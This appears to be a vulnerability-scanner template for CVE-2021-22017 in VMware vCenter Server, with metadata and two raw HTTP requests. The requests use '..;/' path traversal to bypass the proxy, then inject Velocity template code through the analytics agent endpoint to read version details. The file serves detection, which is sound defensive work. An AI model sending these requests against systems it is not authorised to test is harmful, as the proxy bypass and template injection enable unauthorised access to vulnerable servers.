vCenter Server - Improper Access Control

id: CVE-2021-22017

info:
  name: vCenter Server - Improper Access Control
  author: daffainfo
  severity: medium
  description: |
    Rhttproxy as used in vCenter Server contains a vulnerability due to improper implementation of URI normalization. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to bypass proxy leading to internal endpoints being accessed.
  impact: |
    Attackers can bypass proxy restrictions and access internal endpoints, potentially leading to information disclosure or further internal network compromise.
  remediation: |
    Apply the latest security patches or updates provided by VMware for vCenter Server.
  reference:
    - https://github.com/wangsir01/docs/blob/7c20bbf43ae467c1bdc54c65c9a3230ae3e81d63/CVE-2021-22017-22005%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E5%88%86%E6%9E%90/CVE-2021-22017-22005%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E5%88%86%E6%9E%90.md
    - https://www.vmware.com/security/advisories/VMSA-2021-0020.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-22017
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2021-22017
    cwe-id: NVD-CWE-noinfo
    epss-score: 0.74835
    epss-percentile: 0.98884
    cpe: cpe:2.3:a:vmware:vcenter_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: vmware
    product: vcenter_server
    shodan-query: VMware vCenter Server
  tags: cve,cve2021,vmware,vcenter,vkev,kev

flow: http(1) && http(2)

variables:
  plugintype: "{{randbase(8)}}"

http:
  - raw:
      - |
        POST /analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?_c=vSphere.vapi.6_7&_i=9D36C850-1612-4EC4-B8DD-50BA239A25BB HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        X-Deployment-Secret: secret
        X-Plugin-Type: {{plugintype}}

        {"manifestSpec": {"resourceId": "b1", "dataType": "b2", "objectId": "b3", "versionDataType": "b4", "versionObjectId": "b5"}, "objectType": "a1", "collectionTriggerDataNeeded": true, "deploymentDataNeeded": true, "resultNeeded": true, "signalCollectionCompleted": true, "localManifestPath": "a2", "localPayloadPath": "a3", "localObfuscationMapPath": "a4"}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 201'
          - 'len(body) == 0'
        condition: and
        internal: true

  - raw:
      - |
        POST /analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?action=collect&_c=vSphere.vapi.6_7&_i=9D36C850-1612-4EC4-B8DD-50BA239A25BB HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        X-Deployment-Secret: secret
        X-Plugin-Type: {{plugintype}}

        {"manifestContent": "<manifest recommendedPageSize=\"500\">\n   <request>\n      <query name=\"vir:VCenter\">\n         <constraint>\n            <targetType>ServiceInstance</targetType>\n         </constraint>\n         <propertySpec>\n            <propertyNames>content.about.instanceUuid</propertyNames>\n            <propertyNames>content.about.osType</propertyNames>\n            <propertyNames>content.about.build</propertyNames>\n            <propertyNames>content.about.version</propertyNames>\n         </propertySpec>\n      </query>\n   </request>\n   <cdfMapping>\n      <indepedentResultsMapping>\n         <resultSetMappings>\n            <entry>\n               <key>vir:VCenter</key>\n               <value>\n                  <value xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:type=\"resultSetMapping\">\n                     <resourceItemToJsonLdMapping>\n                        <forType>ServiceInstance</forType>\n                     <mappingCode><![CDATA[\n                        #set($modelKey = $LOCAL-resourceItem.resourceItem.getKey())\n                        #set($objectId = \"vim.ServiceInstance:$modelKey.value:$modelKey.serverGuid\")\n                        #set($obj = $LOCAL-cdf20Result.newObject(\"vim.ServiceInstance\", $objectId))\n                        $obj.addProperty(\"MSG\", \"exist\")\n                        $obj.addProperty(\"OSTYPE\", $content-about-osType)\n                        $obj.addProperty(\"BUILD\", $content-about-build)\n                        $obj.addProperty(\"VERSION\", $content-about-version)]]>\n                     </mappingCode>\n                     </resourceItemToJsonLdMapping>\n                  </value>\n               </value>\n            </entry>\n         </resultSetMappings>\n      </indepedentResultsMapping>\n   </cdfMapping>\n   <requestSchedules>\n      <schedule interval=\"1h\">\n         <queries>\n            <query>vir:VCenter</query>\n         </queries>\n      </schedule>\n   </requestSchedules>\n</manifest>", "contextData": "a2", "objectId": "a3"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'BUILD'
          - 'VERSION'
          - 'OSTYPE'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100dcd26a4e3d2ed6f6b7bd353a58091e00d5893cb48f233ead1bf2e30a102e33f402204df09e4cadb2ae33e3e11e6bb6b44594466c4292e2b795a6df8dd9ba3e650b72:922c64590222798bb761d5b6d8e72950